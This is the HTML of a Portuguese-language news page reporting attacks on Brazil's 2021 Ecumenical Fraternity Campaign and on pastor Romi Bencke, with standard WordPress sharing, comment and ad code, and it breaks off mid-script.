<p><a href="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55.jpg"><img data-attachment-id="30626" data-permalink="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/lgbtqi-catolic-cnbb-campanha-jpg-55/" data-orig-file="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55.jpg" data-orig-size="1440,810" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="LGBTQI CATÓLIC CNBB CAMPANHA.jpg 55" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55-300x169.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55-1024x576.jpg" loading="lazy" class="aligncenter size-large wp-image-30626" src="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55-1024x576.jpg" alt="" width="1024" height="576" srcset="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55-1024x576.jpg 1024w, http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55-300x169.jpg 300w, http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55-768x432.jpg 768w, http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55-120x67.jpg 120w, http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA.jpg-55.jpg 1440w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
<blockquote>
<h4 style="text-align: justify;"><span style="color: #000000;">A pastora luterana Romi Bencke, secretária-executiva do Conic, é um dos principais alvos do discurso de ódio. As investidas que ela sofreu motivaram mais de 200 entidades da sociedade civil a protestar e se solidarizar.</span></h4>
</blockquote>
<p style="text-align: justify;">Em carta, a Aliança de Batistas do Brasil repudiou a campanha de ódio e afirmou que os ataques estão sendo direcionados com mais força a lideranças femininas, “além do cunho antiecumênico são carregados de misoginia indisfarçável”.</p>
<p style="text-align: justify;">“Nos vemos perplexos com os ataques que a CFE 2021 (Campanha da Fraternidade Ecumênica) vem sofrendo por parte de setores que buscam, entendemos, usurpar o nome da Igreja Católica Apostólica Romana, que conosco compõe este Conselho, para ataques infundados, injustos e até mesmo criminosos”, diz a carta da Aliança de Batistas.</p>
<h6 style="text-align: right;">(Da Redação com Portal Metrópoles)</h6>

<div style="font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;"></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-30624" class="share-twitter sd-button share-icon no-text" href="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-30624" class="share-facebook sd-button share-icon no-text" href="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/?share=telegram" target="_blank" title="Clique para compartilhar no Telegram"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Telegram(abre em nova janela)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/?share=jetpack-whatsapp" target="_blank" title="Clique para compartilhar no WhatsApp"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no WhatsApp(abre em nova janela)</span></a></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-30624" class="share-skype sd-button share-icon no-text" href="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/?share=skype" target="_blank" title="Clique para compartilhar no Skype"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Skype(abre em nova janela)</span></a></li><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-30624" class="share-linkedin sd-button share-icon no-text" href="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/?share=linkedin" target="_blank" title="Clique para compartilhar no LinkedIn"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no LinkedIn(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article>		<h4 class="widget-title related-content-title">
			<span>Related Articles</span>
		</h4>
		<div class="related-content clearfix"><article class="mh-col mh-1-4 content-grid post-25389 post type-post status-publish format-standard has-post-thumbnail hentry category-internacional tag-francisco tag-papa tag-vaticano">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/mundo-escandalo-de-corrupcao-leva-a-renuncia-um-dos-cardeais-mais-poderosos-da-igreja-catolica/" title="Mundo: ESCÂNDALO DE CORRUPÇÃO LEVA À &#8216;RENÚNCIA&#8217; UM DOS CARDEAIS MAIS PODEROSOS DA IGREJA CATÓLICA"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2020/09/PAPA-ESQ-e1601290962384-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" loading="lazy" srcset="http://oiguassu.com/wp-content/uploads/2020/09/PAPA-ESQ-e1601290962384-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2020/09/PAPA-ESQ-e1601290962384-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2020/09/PAPA-ESQ-e1601290962384-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2020/09/PAPA-ESQ-e1601290962384-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="25395" data-permalink="http://oiguassu.com/mundo-escandalo-de-corrupcao-leva-a-renuncia-um-dos-cardeais-mais-poderosos-da-igreja-catolica/papa-esq/" data-orig-file="http://oiguassu.com/wp-content/uploads/2020/09/PAPA-ESQ-e1601290962384.jpg" data-orig-size="594,447" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="PAPA ESQ" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2020/09/PAPA-ESQ-e1601290962384-300x226.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2020/09/PAPA-ESQ-e1601290962384.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/internacional/" rel="category tag">Internacional</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/mundo-escandalo-de-corrupcao-leva-a-renuncia-um-dos-cardeais-mais-poderosos-da-igreja-catolica/" title="Mundo: ESCÂNDALO DE CORRUPÇÃO LEVA À &#8216;RENÚNCIA&#8217; UM DOS CARDEAIS MAIS PODEROSOS DA IGREJA CATÓLICA" rel="bookmark">
			Mundo: ESCÂNDALO DE CORRUPÇÃO LEVA À &#8216;RENÚNCIA&#8217; UM DOS CARDEAIS MAIS PODEROSOS DA IGREJA CATÓLICA		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-28319 post type-post status-publish format-standard has-post-thumbnail hentry category-latinoamerica tag-aborto tag-alberto-fernandez tag-cristina-fernandez-de-kirchner tag-francisco tag-papa">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/america-latina-alberto-fernandez-promulgo-el-aborto-legal-en-la-argetina/" title="América Latina: ALBERTO FERNÁNDEZ PROMULGÓ EL ABORTO LEGAL EN LA ARGENTINA"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" loading="lazy" srcset="http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina-300x169.jpg 300w, http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina-1024x576.jpg 1024w, http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina-768x432.jpg 768w, http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina-120x67.jpg 120w, http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina.jpg 1280w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="28321" data-permalink="http://oiguassu.com/america-latina-alberto-fernandez-promulgo-el-aborto-legal-en-la-argetina/aborto-argentina-alberto-cristina/" data-orig-file="http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina.jpg" data-orig-size="1280,720" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.8&quot;,&quot;credit&quot;:&quot;Marcelo Endelli&quot;,&quot;camera&quot;:&quot;NIKON D810&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1609299729&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;92&quot;,&quot;iso&quot;:&quot;2500&quot;,&quot;shutter_speed&quot;:&quot;0.003125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="aborto argentina alberto cristina" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina-300x169.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2021/01/aborto-argentina-alberto-cristina-1024x576.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/latinoamerica/" rel="category tag">Latinoamerica</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/america-latina-alberto-fernandez-promulgo-el-aborto-legal-en-la-argetina/" title="América Latina: ALBERTO FERNÁNDEZ PROMULGÓ EL ABORTO LEGAL EN LA ARGENTINA" rel="bookmark">
			América Latina: ALBERTO FERNÁNDEZ PROMULGÓ EL ABORTO LEGAL EN LA ARGENTINA		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-25667 post type-post status-publish format-standard has-post-thumbnail hentry category-argentina tag-alberto-fernandez tag-cristina-fernandez-de-kirchner tag-francisco tag-papa">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/politica-dios-es-argentino-y-nos-salvamos-con-una-cosecha/" title="Política: DIOS ES ARGENTINO Y NOS SALVAMOS CON UNA COSECHA"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2020/08/alberto-fernandezpapa-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" loading="lazy" srcset="http://oiguassu.com/wp-content/uploads/2020/08/alberto-fernandezpapa-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2020/08/alberto-fernandezpapa-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2020/08/alberto-fernandezpapa-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2020/08/alberto-fernandezpapa-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2020/08/alberto-fernandezpapa-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="23770" data-permalink="http://oiguassu.com/confesion-de-alberto-fernandez-vilma-ibarra-me-hizo-una-carta-astral-y-dijo-que-estoy-predestinado-a-construir-sobre-las-cenizas/alberto-fernandezpapa/" data-orig-file="http://oiguassu.com/wp-content/uploads/2020/08/alberto-fernandezpapa.jpg" data-orig-size="1200,976" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="alberto fernandezpapa" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2020/08/alberto-fernandezpapa-300x244.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2020/08/alberto-fernandezpapa-1024x833.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/argentina/" rel="category tag">Argentina</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/politica-dios-es-argentino-y-nos-salvamos-con-una-cosecha/" title="Política: DIOS ES ARGENTINO Y NOS SALVAMOS CON UNA COSECHA" rel="bookmark">
			Política: DIOS ES ARGENTINO Y NOS SALVAMOS CON UNA COSECHA		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-26324 post type-post status-publish format-standard has-post-thumbnail hentry category-internacional tag-francisco tag-papa">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/mundo-la-homosexualidad-un-problema-para-la-iglesia-catolica/" title="Mundo: LA HOMOSEXUALIDAD, UN PROBLEMA PARA LA IGLESIA CATÓLICA"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2020/10/GAY-IGREJA-CAPA-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" loading="lazy" srcset="http://oiguassu.com/wp-content/uploads/2020/10/GAY-IGREJA-CAPA-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2020/10/GAY-IGREJA-CAPA-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2020/10/GAY-IGREJA-CAPA-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2020/10/GAY-IGREJA-CAPA-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2020/10/GAY-IGREJA-CAPA-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="26327" data-permalink="http://oiguassu.com/mundo-la-homosexualidad-un-problema-para-la-iglesia-catolica/ireland-world-meeting-families/" data-orig-file="http://oiguassu.com/wp-content/uploads/2020/10/GAY-IGREJA-CAPA.jpg" data-orig-size="1200,780" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;CNS photo\/Clodagh Kilcoyne, Reuters&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;An LGBT choir sings outside the Pastoral Congress at the World Meeting of Families in Dublin Aug. 23. (CNS photo\/Clodagh Kilcoyne, Reuters) See WMOF-GAY-MARTIN-CUPICH Aug. 23, 2018.&quot;,&quot;created_timestamp&quot;:&quot;1535014278&quot;,&quot;copyright&quot;:&quot;REUTERS&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;IRELAND WORLD MEETING FAMILIES&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="IRELAND WORLD MEETING FAMILIES" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2020/10/GAY-IGREJA-CAPA-300x195.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2020/10/GAY-IGREJA-CAPA-1024x666.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/internacional/" rel="category tag">Internacional</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/mundo-la-homosexualidad-un-problema-para-la-iglesia-catolica/" title="Mundo: LA HOMOSEXUALIDAD, UN PROBLEMA PARA LA IGLESIA CATÓLICA" rel="bookmark">
			Mundo: LA HOMOSEXUALIDAD, UN PROBLEMA PARA LA IGLESIA CATÓLICA		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator">		</div><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "Brasil: CATÓLICOS CONSERVADORES SABOTAM CAMPANHA DA FRATERNIDADE 2021 (LGBTQI+)"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/#respond" style="display:none;">Cancelar resposta</a></small></h3><form action="http://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='30624' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="5bfce732f8" /></p><input type="hidden" id="ak_js" name="ak_js" value="167"/><textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100" style="display: none !important;"></textarea></form>	</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div><div id="archives-2" class="sb-widget clearfix widget_archive"><h4 class="widget-title"><span>Arquivos</span></h4>		<label class="screen-reader-text" for="archives-dropdown-2">Arquivos</label>
		<select id="archives-dropdown-2" name="archive-dropdown">
			
			<option value="">Selecionar o mês</option>
				<option value='http://oiguassu.com/2021/02/'> fevereiro 2021 </option>
	<option value='http://oiguassu.com/2021/01/'> janeiro 2021 </option>
	<option value='http://oiguassu.com/2020/12/'> dezembro 2020 </option>
	<option value='http://oiguassu.com/2020/11/'> novembro 2020 </option>
	<option value='http://oiguassu.com/2020/10/'> outubro 2020 </option>
	<option value='http://oiguassu.com/2020/09/'> setembro 2020 </option>
	<option value='http://oiguassu.com/2020/08/'> agosto 2020 </option>
	<option value='http://oiguassu.com/2020/07/'> julho 2020 </option>
	<option value='http://oiguassu.com/2020/04/'> abril 2020 </option>
	<option value='http://oiguassu.com/2020/03/'> março 2020 </option>
	<option value='http://oiguassu.com/2019/12/'> dezembro 2019 </option>
	<option value='http://oiguassu.com/2019/11/'> novembro 2019 </option>
	<option value='http://oiguassu.com/2019/10/'> outubro 2019 </option>
	<option value='http://oiguassu.com/2019/09/'> setembro 2019 </option>
	<option value='http://oiguassu.com/2019/08/'> agosto 2019 </option>
	<option value='http://oiguassu.com/2019/07/'> julho 2019 </option>
	<option value='http://oiguassu.com/2019/06/'> junho 2019 </option>
	<option value='http://oiguassu.com/2019/05/'> maio 2019 </option>
	<option value='http://oiguassu.com/2019/04/'> abril 2019 </option>
	<option value='http://oiguassu.com/2019/03/'> março 2019 </option>
	<option value='http://oiguassu.com/2019/02/'> fevereiro 2019 </option>
	<option value='http://oiguassu.com/2019/01/'> janeiro 2019 </option>
	<option value='http://oiguassu.com/2018/12/'> dezembro 2018 </option>
	<option value='http://oiguassu.com/2018/11/'> novembro 2018 </option>
	<option value='http://oiguassu.com/2018/10/'> outubro 2018 </option>
	<option value='http://oiguassu.com/2018/09/'> setembro 2018 </option>
	<option value='http://oiguassu.com/2018/08/'> agosto 2018 </option>
	<option value='http://oiguassu.com/2018/07/'> julho 2018 </option>
	<option value='http://oiguassu.com/2018/06/'> junho 2018 </option>
	<option value='http://oiguassu.com/2018/05/'> maio 2018 </option>
	<option value='http://oiguassu.com/2018/04/'> abril 2018 </option>
	<option value='http://oiguassu.com/2018/03/'> março 2018 </option>
	<option value='http://oiguassu.com/2018/02/'> fevereiro 2018 </option>
	<option value='http://oiguassu.com/2018/01/'> janeiro 2018 </option>
	<option value='http://oiguassu.com/2017/12/'> dezembro 2017 </option>
	<option value='http://oiguassu.com/2017/11/'> novembro 2017 </option>
	<option value='http://oiguassu.com/2017/10/'> outubro 2017 </option>
	<option value='http://oiguassu.com/2017/09/'> setembro 2017 </option>
	<option value='http://oiguassu.com/2017/08/'> agosto 2017 </option>

		</select>

<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "archives-dropdown-2" );
	function onSelectChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {
			document.location.href = this.options[ this.selectedIndex ].value;
		}
	}
	dropdown.onchange = onSelectChange;
})();
/* ]]> */
</script>
			</div><div id="categories-2" class="sb-widget clearfix widget_categories"><h4 class="widget-title"><span>Categorias</span></h4><form action="http://oiguassu.com" method="get"><label class="screen-reader-text" for="cat">Categorias</label><select  name='cat' id='cat' class='postform' >
	<option value='-1'>Selecionar categoria</option>
	<option class="level-0" value="7">Argentina</option>
	<option class="level-0" value="4">Brasil</option>
	<option class="level-0" value="9">Colunas</option>
	<option class="level-1" value="19">&nbsp;&nbsp;&nbsp;Blogsfera News</option>
	<option class="level-1" value="839">&nbsp;&nbsp;&nbsp;Caio Gottlieb</option>
	<option class="level-1" value="17">&nbsp;&nbsp;&nbsp;É Direito</option>
	<option class="level-1" value="725">&nbsp;&nbsp;&nbsp;Espaço Cristão</option>
	<option class="level-1" value="10">&nbsp;&nbsp;&nbsp;Nossa Voz</option>
	<option class="level-0" value="312">Economia</option>
	<option class="level-0" value="702">Espaço Cristão</option>
	<option class="level-0" value="866">Esporte</option>
	<option class="level-0" value="1">Extra</option>
	<option class="level-0" value="6">Foz do Iguaçu</option>
	<option class="level-0" value="864">Infraestrutura</option>
	<option class="level-0" value="14">Internacional</option>
	<option class="level-0" value="12">Latinoamerica</option>
	<option class="level-0" value="858">Meio Ambiente</option>
	<option class="level-0" value="868">Mercosul</option>
	<option class="level-0" value="865">Pandemia</option>
	<option class="level-0" value="8">Paraguay</option>
	<option class="level-0" value="5">Paraná</option>
	<option class="level-0" value="308">Política</option>
	<option class="level-0" value="860">Responsabilidade Social</option>
	<option class="level-0" value="863">Saúde</option>
	<option class="level-0" value="856">Tecnologia</option>
	<option class="level-0" value="859">Terceiro Setor</option>
	<option class="level-0" value="370">Tríplice Fronteira</option>
	<option class="level-0" value="857">Turismo</option>
	<option class="level-0" value="703">Última Hora</option>
</select>
</form>
<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "cat" );
	function onCatChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) {
			dropdown.parentNode.submit();
		}
	}
	dropdown.onchange = onCatChange;
})();
/* ]]> */
</script>

			</div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2021 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/oiguassu.com\/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi\/":30624};
	</script>
				<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=5.6.1' id='comment-reply-js'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=5.6.1' id='wp-embed-js'></script>
<script type='text/javascript' id='jetpack-carousel-js-extra'>
/* <![CDATA[ */
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"pt","ajaxurl":"http:\/\/oiguassu.com\/wp-admin\/admin-ajax.php","nonce":"c9ec3a6b74","display_exif":"1","display_comments":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Coment\u00e1rio","post_comment":"Publicar coment\u00e1rio","write_comment":"Escreva um Coment\u00e1rio","loading_comments":"Carregando coment\u00e1rios...","download_original":"Visualizar tamanho original <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Certifique-se de enviar algum texto com o seu coment\u00e1rio.","no_comment_email":"Informe um endere\u00e7o de e-mail para comentar.","no_comment_author":"Forne\u00e7a seu nome para comentar.","comment_post_error":"Desculpe, mas ocorreu um erro ao postar seu coment\u00e1rio. Tente novamente mais tarde.","comment_approved":"Seu coment\u00e1rio foi aprovado.","comment_unapproved":"Seu coment\u00e1rio est\u00e1 aguardando modera\u00e7\u00e3o.","camera":"C\u00e2mera","aperture":"Abertura","shutter_speed":"Velocidade do Obturador","focal_length":"Comprimento Focal","copyright":"Direito autoral","comment_registration":"0","require_name_email":"1","login_url":"http:\/\/oiguassu.com\/wp-login.php?redirect_to=http%3A%2F%2Foiguassu.com%2Fbrasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">E-mail (obrigat\u00f3rio)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Nome (obrigat\u00f3rio)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Site<\/label> <input type=\"text\" 